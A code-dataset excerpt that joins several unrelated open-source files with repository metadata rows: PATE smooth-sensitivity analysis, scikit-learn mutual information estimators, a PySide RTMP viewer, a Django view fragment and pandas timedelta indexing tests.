return HttpResponseRedirect(resolve_url('thankyou'))
current_item = 'Create Action Group'
context = RequestContext(request, locals())
return render_to_response('sfpirg/action_group_create.html', {}, context_instance=context)
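# Illustrative URLconf wiring for these views (a sketch only; the patterns and
# names are assumptions, not taken from the project's actual urls.py):
#   from django.conf.urls import url
#   from sfpirgapp.views import actiongroups
#   urlpatterns = [
#       url(r'^action-groups/$', actiongroups.aglist, name='aglist'),
#       url(r'^action-groups/request/$', actiongroups.request_group, name='request_group'),
#       url(r'^action-groups/create/$', actiongroups.create, name='actiongroup_create'),
#       url(r'^action-groups/(?P<slug>[\w-]+)/$', actiongroups.actiongroup, name='actiongroup'),
#   ]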
|
bsd-2-clause
| -6,149,214,096,364,828,000
| 42.869565
| 99
| 0.649554
| false
| 4.17287
| false
| false
| false
|
cshallue/models
|
research/differential_privacy/pate/smooth_sensitivity.py
|
1
|
13739
|
# Copyright 2017 The 'Scalable Private Learning with PATE' Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for smooth sensitivity analysis for PATE mechanisms.
This library implements functionality for doing smooth sensitivity analysis
for Gaussian Noise Max (GNMax), Threshold with Gaussian noise, and Gaussian
Noise with Smooth Sensitivity (GNSS) mechanisms.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
import numpy as np
import scipy
import sympy as sp
import core as pate
################################
# SMOOTH SENSITIVITY FOR GNMAX #
################################
# Global dictionary for storing cached q0 values keyed by (sigma, order).
_logq0_cache = {}
def _compute_logq0(sigma, order):
key = (sigma, order)
if key in _logq0_cache:
return _logq0_cache[key]
logq0 = compute_logq0_gnmax(sigma, order)
_logq0_cache[key] = logq0 # Update the global variable.
return logq0
def _compute_logq1(sigma, order, num_classes):
logq0 = _compute_logq0(sigma, order) # Most likely already cached.
logq1 = math.log(_compute_bl_gnmax(math.exp(logq0), sigma, num_classes))
assert logq1 <= logq0
return logq1
def _compute_mu1_mu2_gnmax(sigma, logq):
# Computes mu1, mu2 according to Proposition 10.
mu2 = sigma * math.sqrt(-logq)
mu1 = mu2 + 1
return mu1, mu2
def _compute_data_dep_bound_gnmax(sigma, logq, order):
# Applies Theorem 6 in Appendix without checking that logq satisfies necessary
# constraints. The pre-conditions must be assured by comparing logq against
# logq0 by the caller.
variance = sigma**2
mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
eps1 = mu1 / variance
eps2 = mu2 / variance
log1q = np.log1p(-math.exp(logq)) # log1q = log(1-q)
log_a = (order - 1) * (
log1q - (np.log1p(-math.exp((logq + eps2) * (1 - 1 / mu2)))))
log_b = (order - 1) * (eps1 - logq / (mu1 - 1))
return np.logaddexp(log1q + log_a, logq + log_b) / (order - 1)
def _compute_rdp_gnmax(sigma, logq, order):
logq0 = _compute_logq0(sigma, order)
if logq >= logq0:
return pate.rdp_data_independent_gaussian(sigma, order)
else:
return _compute_data_dep_bound_gnmax(sigma, logq, order)
def compute_logq0_gnmax(sigma, order):
"""Computes the point where we start using data-independent bounds.
Args:
sigma: std of the Gaussian noise
order: Renyi order lambda
Returns:
logq0: the point above which the data-ind bound overtakes data-dependent
bound.
"""
def _check_validity_conditions(logq):
# Function returns true iff logq is in the range where data-dependent bound
# is valid. (Theorem 6 in Appendix.)
mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
if mu1 < order:
return False
eps2 = mu2 / sigma**2
# Do computation in the log space. The condition below comes from Lemma 9
# from Appendix.
return (logq <= (mu2 - 1) * eps2 - mu2 * math.log(mu1 / (mu1 - 1) * mu2 /
(mu2 - 1)))
def _compare_dep_vs_ind(logq):
return (_compute_data_dep_bound_gnmax(sigma, logq, order) -
pate.rdp_data_independent_gaussian(sigma, order))
# Natural upper bounds on q0.
logub = min(-(1 + 1. / sigma)**2, -((order - .99) / sigma)**2, -1 / sigma**2)
assert _check_validity_conditions(logub)
# If data-dependent bound is already better, we are done already.
if _compare_dep_vs_ind(logub) < 0:
return logub
# Identifying a reasonable lower bound to bracket logq0.
loglb = 2 * logub # logub is negative, and thus loglb < logub.
while _compare_dep_vs_ind(loglb) > 0:
assert loglb > -10000, "The lower bound on q0 is way too low."
loglb *= 1.5
logq0, r = scipy.optimize.brentq(
_compare_dep_vs_ind, loglb, logub, full_output=True)
assert r.converged, "The root finding procedure failed to converge."
assert _check_validity_conditions(logq0) # just in case.
return logq0
def _compute_bl_gnmax(q, sigma, num_classes):
return ((num_classes - 1) / 2 * scipy.special.erfc(
1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_bu_gnmax(q, sigma, num_classes):
return min(1, (num_classes - 1) / 2 * scipy.special.erfc(
-1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_local_sens_gnmax(logq, sigma, num_classes, order):
"""Implements Algorithm 3 (computes an upper bound on local sensitivity).
(See Proposition 13 for proof of correctness.)
"""
logq0 = _compute_logq0(sigma, order)
logq1 = _compute_logq1(sigma, order, num_classes)
if logq1 <= logq <= logq0:
logq = logq1
beta = _compute_rdp_gnmax(sigma, logq, order)
beta_bu_q = _compute_rdp_gnmax(
sigma, math.log(_compute_bu_gnmax(math.exp(logq), sigma, num_classes)),
order)
beta_bl_q = _compute_rdp_gnmax(
sigma, math.log(_compute_bl_gnmax(math.exp(logq), sigma, num_classes)),
order)
return max(beta_bu_q - beta, beta - beta_bl_q)
def compute_local_sensitivity_bounds_gnmax(votes, num_teachers, sigma, order):
"""Computes a list of max-LS-at-distance-d for the GNMax mechanism.
A more efficient implementation of Algorithms 4 and 5 working in time
O(teachers*classes). A naive implementation is O(teachers^2*classes) or worse.
Args:
votes: A numpy array of votes.
num_teachers: Total number of voting teachers.
    sigma: Standard deviation of the Gaussian noise.
order: The Renyi order.
Returns:
A numpy array of local sensitivities at distances d, 0 <= d <= num_teachers.
"""
num_classes = len(votes) # Called m in the paper.
logq0 = _compute_logq0(sigma, order)
logq1 = _compute_logq1(sigma, order, num_classes)
logq = pate.compute_logq_gaussian(votes, sigma)
plateau = _compute_local_sens_gnmax(logq1, sigma, num_classes, order)
res = np.full(num_teachers, plateau)
if logq1 <= logq <= logq0:
return res
# Invariant: votes is sorted in the non-increasing order.
votes = sorted(votes, reverse=True)
res[0] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
curr_d = 0
go_left = logq > logq0 # Otherwise logq < logq1 and we go right.
# Iterate while the following is true:
# 1. If we are going left, logq is still larger than logq0 and we may still
# increase the gap between votes[0] and votes[1].
# 2. If we are going right, logq is still smaller than logq1.
while ((go_left and logq > logq0 and votes[1] > 0) or
(not go_left and logq < logq1)):
curr_d += 1
if go_left: # Try decreasing logq.
votes[0] += 1
votes[1] -= 1
idx = 1
# Restore the invariant. (Can be implemented more efficiently by keeping
# track of the range of indices equal to votes[1]. Does not seem to matter
# for the overall running time.)
while idx < len(votes) - 1 and votes[idx] < votes[idx + 1]:
votes[idx], votes[idx + 1] = votes[idx + 1], votes[idx]
idx += 1
else: # Go right, i.e., try increasing logq.
votes[0] -= 1
votes[1] += 1 # The invariant holds since otherwise logq >= logq1.
logq = pate.compute_logq_gaussian(votes, sigma)
res[curr_d] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
return res
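# Illustrative call (a sketch only; the vote histogram, sigma and order below
# are arbitrary values chosen to show the signature, not recommended settings):
#   votes = np.array([300, 80, 20])   # one count per class, 400 teachers total
#   ls = compute_local_sensitivity_bounds_gnmax(votes, num_teachers=400,
#                                               sigma=40.0, order=20.0)
#   # ls[d] bounds the local sensitivity at Hamming distance d from `votes`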
##################################################
# SMOOTH SENSITIVITY FOR THE THRESHOLD MECHANISM #
##################################################
# A global dictionary of RDPs for various threshold values. Indexed by a 4-tuple
# (num_teachers, threshold, sigma, order).
_rdp_thresholds = {}
def _compute_rdp_list_threshold(num_teachers, threshold, sigma, order):
key = (num_teachers, threshold, sigma, order)
if key in _rdp_thresholds:
return _rdp_thresholds[key]
res = np.zeros(num_teachers + 1)
for v in range(0, num_teachers + 1):
logp = scipy.stats.norm.logsf(threshold - v, scale=sigma)
res[v] = pate.compute_rdp_threshold(logp, sigma, order)
_rdp_thresholds[key] = res
return res
def compute_local_sensitivity_bounds_threshold(counts, num_teachers, threshold,
sigma, order):
"""Computes a list of max-LS-at-distance-d for the threshold mechanism."""
def _compute_ls(v):
ls_step_up, ls_step_down = None, None
if v > 0:
ls_step_down = abs(rdp_list[v - 1] - rdp_list[v])
if v < num_teachers:
ls_step_up = abs(rdp_list[v + 1] - rdp_list[v])
return max(ls_step_down, ls_step_up) # Rely on max(x, None) = x.
cur_max = int(round(max(counts)))
rdp_list = _compute_rdp_list_threshold(num_teachers, threshold, sigma, order)
ls = np.zeros(num_teachers)
for d in range(max(cur_max, num_teachers - cur_max)):
ls_up, ls_down = None, None
if cur_max + d <= num_teachers:
ls_up = _compute_ls(cur_max + d)
if cur_max - d >= 0:
ls_down = _compute_ls(cur_max - d)
ls[d] = max(ls_up, ls_down)
return ls
#############################################
# PROCEDURES FOR SMOOTH SENSITIVITY RELEASE #
#############################################
# A global dictionary of exponentially decaying arrays. Indexed by beta.
dict_beta_discount = {}
def compute_discounted_max(beta, a):
n = len(a)
if beta not in dict_beta_discount or (len(dict_beta_discount[beta]) < n):
dict_beta_discount[beta] = np.exp(-beta * np.arange(n))
return max(a * dict_beta_discount[beta][:n])
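# Worked example for compute_discounted_max (illustrative values): with
# beta = 0.5 and a = [4, 1, 5] the discount factors are [1, e^-0.5, e^-1]
# ~= [1, 0.607, 0.368], the discounted values are ~[4, 0.607, 1.839], and
# the function returns 4.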
def compute_smooth_sensitivity_gnmax(beta, counts, num_teachers, sigma, order):
"""Computes smooth sensitivity of a single application of GNMax."""
  ls = compute_local_sensitivity_bounds_gnmax(counts, num_teachers, sigma,
                                              order)
return compute_discounted_max(beta, ls)
def compute_rdp_of_smooth_sensitivity_gaussian(beta, sigma, order):
"""Computes the RDP curve for the GNSS mechanism.
Implements Theorem 23 (https://arxiv.org/pdf/1802.08908.pdf).
"""
if beta > 0 and not 1 < order < 1 / (2 * beta):
raise ValueError("Order outside the (1, 1/(2*beta)) range.")
return order * math.exp(2 * beta) / sigma**2 + (
-.5 * math.log(1 - 2 * order * beta) + beta * order) / (
order - 1)
def compute_params_for_ss_release(eps, delta):
"""Computes sigma for additive Gaussian noise scaled by smooth sensitivity.
Presently not used. (We proceed via RDP analysis.)
Compute beta, sigma for applying Lemma 2.6 (full version of Nissim et al.) via
Lemma 2.10.
"""
# Rather than applying Lemma 2.10 directly, which would give suboptimal alpha,
# (see http://www.cse.psu.edu/~ads22/pubs/NRS07/NRS07-full-draft-v1.pdf),
# we extract a sufficient condition on alpha from its proof.
#
# Let a = rho_(delta/2)(Z_1). Then solve for alpha such that
# 2 alpha a + alpha^2 = eps/2.
a = scipy.special.ndtri(1 - delta / 2)
alpha = math.sqrt(a**2 + eps / 2) - a
beta = eps / (2 * scipy.special.chdtri(1, delta / 2))
return alpha, beta
#######################################################
# SYMBOLIC-NUMERIC VERIFICATION OF CONDITIONS C5--C6. #
#######################################################
def _construct_symbolic_beta(q, sigma, order):
mu2 = sigma * sp.sqrt(sp.log(1 / q))
mu1 = mu2 + 1
eps1 = mu1 / sigma**2
eps2 = mu2 / sigma**2
a = (1 - q) / (1 - (q * sp.exp(eps2))**(1 - 1 / mu2))
b = sp.exp(eps1) / q**(1 / (mu1 - 1))
s = (1 - q) * a**(order - 1) + q * b**(order - 1)
return (1 / (order - 1)) * sp.log(s)
def _construct_symbolic_bu(q, sigma, m):
return (m - 1) / 2 * sp.erfc(sp.erfcinv(2 * q / (m - 1)) - 1 / sigma)
def _is_non_decreasing(fn, q, bounds):
"""Verifies whether the function is non-decreasing within a range.
Args:
fn: Symbolic function of a single variable.
q: The name of f's variable.
bounds: Pair of (lower_bound, upper_bound) reals.
Returns:
True iff the function is non-decreasing in the range.
"""
diff_fn = sp.diff(fn, q) # Symbolically compute the derivative.
diff_fn_lambdified = sp.lambdify(
q,
diff_fn,
modules=[
"numpy", {
"erfc": scipy.special.erfc,
"erfcinv": scipy.special.erfcinv
}
])
r = scipy.optimize.minimize_scalar(
diff_fn_lambdified, bounds=bounds, method="bounded")
assert r.success, "Minimizer failed to converge."
return r.fun >= 0 # Check whether the derivative is non-negative.
def check_conditions(sigma, m, order):
"""Checks conditions C5 and C6 (Section B.4.2 in Appendix)."""
q = sp.symbols("q", positive=True, real=True)
beta = _construct_symbolic_beta(q, sigma, order)
q0 = math.exp(compute_logq0_gnmax(sigma, order))
cond5 = _is_non_decreasing(beta, q, (0, q0))
if cond5:
bl_q0 = _compute_bl_gnmax(q0, sigma, m)
bu = _construct_symbolic_bu(q, sigma, m)
delta_beta = beta.subs(q, bu) - beta
cond6 = _is_non_decreasing(delta_beta, q, (0, bl_q0))
else:
cond6 = False # Skip the check, since Condition 5 is false already.
return (cond5, cond6)
def main(argv):
del argv # Unused.
if __name__ == "__main__":
app.run(main)
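# Example invocation sketch (not part of the original module; sigma, number of
# classes m and order are arbitrary placeholders):
#   cond5, cond6 = check_conditions(sigma=40.0, m=10, order=20.0)
#   # the smooth-sensitivity analysis in the paper assumes both conditions hold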
|
apache-2.0
| -4,641,048,824,878,597,000
| 31.789976
| 87
| 0.635126
| false
| 3.116126
| false
| false
| false
|
kevin-intel/scikit-learn
|
sklearn/feature_selection/_mutual_info.py
|
3
|
16639
|
# Author: Nikolay Mayorov <n59_ru@hotmail.com>
# License: 3-clause BSD
import numpy as np
from scipy.sparse import issparse
from scipy.special import digamma
from ..metrics.cluster import mutual_info_score
from ..neighbors import NearestNeighbors, KDTree
from ..preprocessing import scale
from ..utils import check_random_state
from ..utils.fixes import _astype_copy_false
from ..utils.validation import check_array, check_X_y
from ..utils.multiclass import check_classification_targets
def _compute_mi_cc(x, y, n_neighbors):
"""Compute mutual information between two continuous variables.
Parameters
----------
x, y : ndarray, shape (n_samples,)
Samples of two continuous random variables, must have an identical
shape.
n_neighbors : int
Number of nearest neighbors to search for each point, see [1]_.
Returns
-------
mi : float
Estimated mutual information. If it turned out to be negative it is
        replaced by 0.
Notes
-----
True mutual information can't be negative. If its estimate by a numerical
method is negative, it means (providing the method is adequate) that the
mutual information is close to 0 and replacing it by 0 is a reasonable
strategy.
References
----------
.. [1] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
"""
n_samples = x.size
x = x.reshape((-1, 1))
y = y.reshape((-1, 1))
xy = np.hstack((x, y))
# Here we rely on NearestNeighbors to select the fastest algorithm.
nn = NearestNeighbors(metric='chebyshev', n_neighbors=n_neighbors)
nn.fit(xy)
radius = nn.kneighbors()[0]
radius = np.nextafter(radius[:, -1], 0)
# KDTree is explicitly fit to allow for the querying of number of
# neighbors within a specified radius
kd = KDTree(x, metric='chebyshev')
nx = kd.query_radius(x, radius, count_only=True, return_distance=False)
nx = np.array(nx) - 1.0
kd = KDTree(y, metric='chebyshev')
ny = kd.query_radius(y, radius, count_only=True, return_distance=False)
ny = np.array(ny) - 1.0
mi = (digamma(n_samples) + digamma(n_neighbors) -
np.mean(digamma(nx + 1)) - np.mean(digamma(ny + 1)))
return max(0, mi)
def _compute_mi_cd(c, d, n_neighbors):
"""Compute mutual information between continuous and discrete variables.
Parameters
----------
c : ndarray, shape (n_samples,)
Samples of a continuous random variable.
d : ndarray, shape (n_samples,)
Samples of a discrete random variable.
n_neighbors : int
Number of nearest neighbors to search for each point, see [1]_.
Returns
-------
mi : float
Estimated mutual information. If it turned out to be negative it is
        replaced by 0.
Notes
-----
True mutual information can't be negative. If its estimate by a numerical
method is negative, it means (providing the method is adequate) that the
mutual information is close to 0 and replacing it by 0 is a reasonable
strategy.
References
----------
.. [1] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
"""
n_samples = c.shape[0]
c = c.reshape((-1, 1))
radius = np.empty(n_samples)
label_counts = np.empty(n_samples)
k_all = np.empty(n_samples)
nn = NearestNeighbors()
for label in np.unique(d):
mask = d == label
count = np.sum(mask)
if count > 1:
k = min(n_neighbors, count - 1)
nn.set_params(n_neighbors=k)
nn.fit(c[mask])
r = nn.kneighbors()[0]
radius[mask] = np.nextafter(r[:, -1], 0)
k_all[mask] = k
label_counts[mask] = count
# Ignore points with unique labels.
mask = label_counts > 1
n_samples = np.sum(mask)
label_counts = label_counts[mask]
k_all = k_all[mask]
c = c[mask]
radius = radius[mask]
kd = KDTree(c)
m_all = kd.query_radius(c, radius, count_only=True, return_distance=False)
m_all = np.array(m_all) - 1.0
mi = (digamma(n_samples) + np.mean(digamma(k_all)) -
np.mean(digamma(label_counts)) -
np.mean(digamma(m_all + 1)))
return max(0, mi)
def _compute_mi(x, y, x_discrete, y_discrete, n_neighbors=3):
"""Compute mutual information between two variables.
This is a simple wrapper which selects a proper function to call based on
whether `x` and `y` are discrete or not.
"""
if x_discrete and y_discrete:
return mutual_info_score(x, y)
elif x_discrete and not y_discrete:
return _compute_mi_cd(y, x, n_neighbors)
elif not x_discrete and y_discrete:
return _compute_mi_cd(x, y, n_neighbors)
else:
return _compute_mi_cc(x, y, n_neighbors)
def _iterate_columns(X, columns=None):
"""Iterate over columns of a matrix.
Parameters
----------
X : ndarray or csc_matrix, shape (n_samples, n_features)
Matrix over which to iterate.
columns : iterable or None, default=None
Indices of columns to iterate over. If None, iterate over all columns.
Yields
------
x : ndarray, shape (n_samples,)
Columns of `X` in dense format.
"""
if columns is None:
columns = range(X.shape[1])
if issparse(X):
for i in columns:
x = np.zeros(X.shape[0])
start_ptr, end_ptr = X.indptr[i], X.indptr[i + 1]
x[X.indices[start_ptr:end_ptr]] = X.data[start_ptr:end_ptr]
yield x
else:
for i in columns:
yield X[:, i]
def _estimate_mi(X, y, discrete_features='auto', discrete_target=False,
n_neighbors=3, copy=True, random_state=None):
"""Estimate mutual information between the features and the target.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Feature matrix.
y : array-like of shape (n_samples,)
Target vector.
discrete_features : {'auto', bool, array-like}, default='auto'
If bool, then determines whether to consider all features discrete
or continuous. If array, then it should be either a boolean mask
with shape (n_features,) or array with indices of discrete features.
If 'auto', it is assigned to False for dense `X` and to True for
sparse `X`.
discrete_target : bool, default=False
Whether to consider `y` as a discrete variable.
n_neighbors : int, default=3
Number of neighbors to use for MI estimation for continuous variables,
see [1]_ and [2]_. Higher values reduce variance of the estimation, but
could introduce a bias.
copy : bool, default=True
Whether to make a copy of the given data. If set to False, the initial
data will be overwritten.
random_state : int, RandomState instance or None, default=None
Determines random number generation for adding small noise to
continuous variables in order to remove repeated values.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Returns
-------
mi : ndarray, shape (n_features,)
Estimated mutual information between each feature and the target.
A negative value will be replaced by 0.
References
----------
.. [1] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
.. [2] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
"""
X, y = check_X_y(X, y, accept_sparse='csc', y_numeric=not discrete_target)
n_samples, n_features = X.shape
if isinstance(discrete_features, (str, bool)):
if isinstance(discrete_features, str):
if discrete_features == 'auto':
discrete_features = issparse(X)
else:
raise ValueError("Invalid string value for discrete_features.")
discrete_mask = np.empty(n_features, dtype=bool)
discrete_mask.fill(discrete_features)
else:
discrete_features = check_array(discrete_features, ensure_2d=False)
if discrete_features.dtype != 'bool':
discrete_mask = np.zeros(n_features, dtype=bool)
discrete_mask[discrete_features] = True
else:
discrete_mask = discrete_features
continuous_mask = ~discrete_mask
if np.any(continuous_mask) and issparse(X):
raise ValueError("Sparse matrix `X` can't have continuous features.")
rng = check_random_state(random_state)
if np.any(continuous_mask):
if copy:
X = X.copy()
if not discrete_target:
X[:, continuous_mask] = scale(X[:, continuous_mask],
with_mean=False, copy=False)
# Add small noise to continuous features as advised in Kraskov et. al.
X = X.astype(float, **_astype_copy_false(X))
means = np.maximum(1, np.mean(np.abs(X[:, continuous_mask]), axis=0))
X[:, continuous_mask] += 1e-10 * means * rng.randn(
n_samples, np.sum(continuous_mask))
if not discrete_target:
y = scale(y, with_mean=False)
y += 1e-10 * np.maximum(1, np.mean(np.abs(y))) * rng.randn(n_samples)
mi = [_compute_mi(x, y, discrete_feature, discrete_target, n_neighbors) for
x, discrete_feature in zip(_iterate_columns(X), discrete_mask)]
return np.array(mi)
def mutual_info_regression(X, y, *, discrete_features='auto', n_neighbors=3,
copy=True, random_state=None):
"""Estimate mutual information for a continuous target variable.
Mutual information (MI) [1]_ between two random variables is a non-negative
value, which measures the dependency between the variables. It is equal
to zero if and only if two random variables are independent, and higher
values mean higher dependency.
The function relies on nonparametric methods based on entropy estimation
from k-nearest neighbors distances as described in [2]_ and [3]_. Both
methods are based on the idea originally proposed in [4]_.
It can be used for univariate features selection, read more in the
:ref:`User Guide <univariate_feature_selection>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Feature matrix.
y : array-like of shape (n_samples,)
Target vector.
discrete_features : {'auto', bool, array-like}, default='auto'
If bool, then determines whether to consider all features discrete
or continuous. If array, then it should be either a boolean mask
with shape (n_features,) or array with indices of discrete features.
If 'auto', it is assigned to False for dense `X` and to True for
sparse `X`.
n_neighbors : int, default=3
Number of neighbors to use for MI estimation for continuous variables,
see [2]_ and [3]_. Higher values reduce variance of the estimation, but
could introduce a bias.
copy : bool, default=True
Whether to make a copy of the given data. If set to False, the initial
data will be overwritten.
random_state : int, RandomState instance or None, default=None
Determines random number generation for adding small noise to
continuous variables in order to remove repeated values.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Returns
-------
mi : ndarray, shape (n_features,)
Estimated mutual information between each feature and the target.
Notes
-----
1. The term "discrete features" is used instead of naming them
"categorical", because it describes the essence more accurately.
For example, pixel intensities of an image are discrete features
       (but hardly categorical) and you will get better results if you mark
       them as such. Also note that treating a continuous variable as discrete
       and vice versa will usually give incorrect results, so be attentive
       about that.
2. True mutual information can't be negative. If its estimate turns out
to be negative, it is replaced by zero.
References
----------
.. [1] `Mutual Information
<https://en.wikipedia.org/wiki/Mutual_information>`_
on Wikipedia.
.. [2] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
.. [3] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
.. [4] L. F. Kozachenko, N. N. Leonenko, "Sample Estimate of the Entropy
of a Random Vector", Probl. Peredachi Inf., 23:2 (1987), 9-16
"""
return _estimate_mi(X, y, discrete_features, False, n_neighbors,
copy, random_state)
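# Illustrative usage (synthetic data, not part of scikit-learn): y depends on
# the first feature only, so its estimated MI should dominate.
#   rng = np.random.RandomState(0)
#   X = rng.rand(1000, 3)
#   y = X[:, 0] + 0.1 * rng.randn(1000)
#   mi = mutual_info_regression(X, y, random_state=0)
#   # mi[0] is expected to be clearly the largest of the three entries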
def mutual_info_classif(X, y, *, discrete_features='auto', n_neighbors=3,
copy=True, random_state=None):
"""Estimate mutual information for a discrete target variable.
Mutual information (MI) [1]_ between two random variables is a non-negative
value, which measures the dependency between the variables. It is equal
to zero if and only if two random variables are independent, and higher
values mean higher dependency.
The function relies on nonparametric methods based on entropy estimation
from k-nearest neighbors distances as described in [2]_ and [3]_. Both
methods are based on the idea originally proposed in [4]_.
It can be used for univariate features selection, read more in the
:ref:`User Guide <univariate_feature_selection>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Feature matrix.
y : array-like of shape (n_samples,)
Target vector.
discrete_features : {'auto', bool, array-like}, default='auto'
If bool, then determines whether to consider all features discrete
or continuous. If array, then it should be either a boolean mask
with shape (n_features,) or array with indices of discrete features.
If 'auto', it is assigned to False for dense `X` and to True for
sparse `X`.
n_neighbors : int, default=3
Number of neighbors to use for MI estimation for continuous variables,
see [2]_ and [3]_. Higher values reduce variance of the estimation, but
could introduce a bias.
copy : bool, default=True
Whether to make a copy of the given data. If set to False, the initial
data will be overwritten.
random_state : int, RandomState instance or None, default=None
Determines random number generation for adding small noise to
continuous variables in order to remove repeated values.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
Returns
-------
mi : ndarray, shape (n_features,)
Estimated mutual information between each feature and the target.
Notes
-----
1. The term "discrete features" is used instead of naming them
"categorical", because it describes the essence more accurately.
For example, pixel intensities of an image are discrete features
       (but hardly categorical) and you will get better results if you mark
       them as such. Also note that treating a continuous variable as discrete
       and vice versa will usually give incorrect results, so be attentive
       about that.
2. True mutual information can't be negative. If its estimate turns out
to be negative, it is replaced by zero.
References
----------
.. [1] `Mutual Information
<https://en.wikipedia.org/wiki/Mutual_information>`_
on Wikipedia.
.. [2] A. Kraskov, H. Stogbauer and P. Grassberger, "Estimating mutual
information". Phys. Rev. E 69, 2004.
.. [3] B. C. Ross "Mutual Information between Discrete and Continuous
Data Sets". PLoS ONE 9(2), 2014.
.. [4] L. F. Kozachenko, N. N. Leonenko, "Sample Estimate of the Entropy
           of a Random Vector", Probl. Peredachi Inf., 23:2 (1987), 9-16
"""
check_classification_targets(y)
return _estimate_mi(X, y, discrete_features, True, n_neighbors,
copy, random_state)
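# Illustrative usage (synthetic data, not part of scikit-learn): the class
# label is a threshold on the first feature, so that feature should carry
# essentially all of the estimated information.
#   rng = np.random.RandomState(0)
#   X = rng.rand(1000, 3)
#   y = (X[:, 0] > 0.5).astype(int)
#   mi = mutual_info_classif(X, y, discrete_features=False, random_state=0)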
|
bsd-3-clause
| -3,846,150,620,233,349,600
| 36.307175
| 79
| 0.640603
| false
| 3.913217
| false
| false
| false
|
Ingener74/Old-Star
|
video.py
|
1
|
1386
|
# encoding: utf8
from PySide.QtCore import Qt, QThread
from PySide.QtGui import QWidget, QApplication
import sys
from librtmp import RTMP, RTMPError
from res import (Ui_VideoWidget)
class StreamThread(QThread):
def __init__(self):
QThread.__init__(self)
def run(self):
try:
rtmp = RTMP(url='rtmp://127.0.0.1:1935/live/test')
print '1'
print rtmp
print '2'
print rtmp.connect()
print '3'
pkt = rtmp.read_packet()
print '4'
print pkt
print '5'
stream = rtmp.create_stream()
print '6'
print stream
# data = stream.read(1024)
except RTMPError, e:
print e
class Video(QWidget, Ui_VideoWidget):
def __init__(self, parent=None):
QWidget.__init__(self, parent)
self.setupUi(self)
self.controlButton.clicked.connect(self.onControlButton)
def onControlButton(self):
self.streamThread = StreamThread()
self.streamThread.start()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Escape:
self.close()
if __name__ == '__main__':
# noinspection PyCallByClass
QApplication.setStyle("plastique")
app = QApplication(sys.argv)
video = Video()
video.show()
sys.exit(app.exec_())
|
lgpl-3.0
| 8,452,937,607,431,824,000
| 20.323077
| 64
| 0.560606
| false
| 3.79726
| false
| false
| false
|
buret/pylmflib
|
pylmflib/morphology/component.py
|
1
|
1531
|
#! /usr/bin/env python
"""! @package morphology
"""
class Component():
def __init__(self, position=None, lexeme=None):
"""! @brief Constructor.
Component instances are owned by ListOfComponents.
@param position The position of the component in the multiword expression.
        @param lexeme Related lexeme, stored in the 'targets' attribute.
@return A Component instance.
"""
self.position = position
# Composed LexicalEntry lexeme
self.targets = lexeme
## Pointer to an existing LexicalEntry
# There is one LexicalEntry pointer by Component instance
self.__lexical_entry = None
def __del__(self):
"""! @brief Destructor.
"""
# Decrement the reference count on pointed objects
self.__lexical_entry = None
def set_lexical_entry(self, lexical_entry):
"""! @brief Set pointer to the component lexical entry instance. This function can only be called once the full dictionary has been parsed.
@param lexical_entry The component LexicalEntry.
@return Component instance.
"""
self.__lexical_entry = lexical_entry
return self
def get_lexical_entry(self):
"""! @brief Get pointed lexical entry.
@return Component private attribute '__lexical_entry'.
"""
return self.__lexical_entry
def get_lexeme(self):
"""! @brief Get component LexicalEntry lexeme.
@return Component attribute 'targets'.
"""
return self.targets
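# Minimal usage sketch (not part of the original module; `entry` stands for a
# LexicalEntry instance built elsewhere in pylmflib and is assumed here):
#   c = Component(position=1, lexeme="kick")
#   c.set_lexical_entry(entry)
#   c.get_lexeme()          # -> "kick"
#   c.get_lexical_entry()   # -> entry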
|
gpl-2.0
| -6,142,575,380,407,489,000
| 33.022222
| 147
| 0.625735
| false
| 4.349432
| false
| false
| false
|
cbertinato/pandas
|
pandas/tests/indexes/timedeltas/test_indexing.py
|
1
|
13473
|
from datetime import datetime, timedelta
import numpy as np
import pytest
import pandas as pd
from pandas import Index, Timedelta, TimedeltaIndex, timedelta_range
import pandas.util.testing as tm
class TestGetItem:
def test_ellipsis(self):
# GH#21282
idx = timedelta_range('1 day', '31 day', freq='D', name='idx')
result = idx[...]
assert result.equals(idx)
assert result is not idx
def test_getitem(self):
idx1 = timedelta_range('1 day', '31 day', freq='D', name='idx')
for idx in [idx1]:
result = idx[0]
assert result == Timedelta('1 day')
result = idx[0:5]
expected = timedelta_range('1 day', '5 day', freq='D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx[0:10:2]
expected = timedelta_range('1 day', '9 day', freq='2D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx[-20:-5:3]
expected = timedelta_range('12 day', '24 day', freq='3D',
name='idx')
tm.assert_index_equal(result, expected)
assert result.freq == expected.freq
result = idx[4::-1]
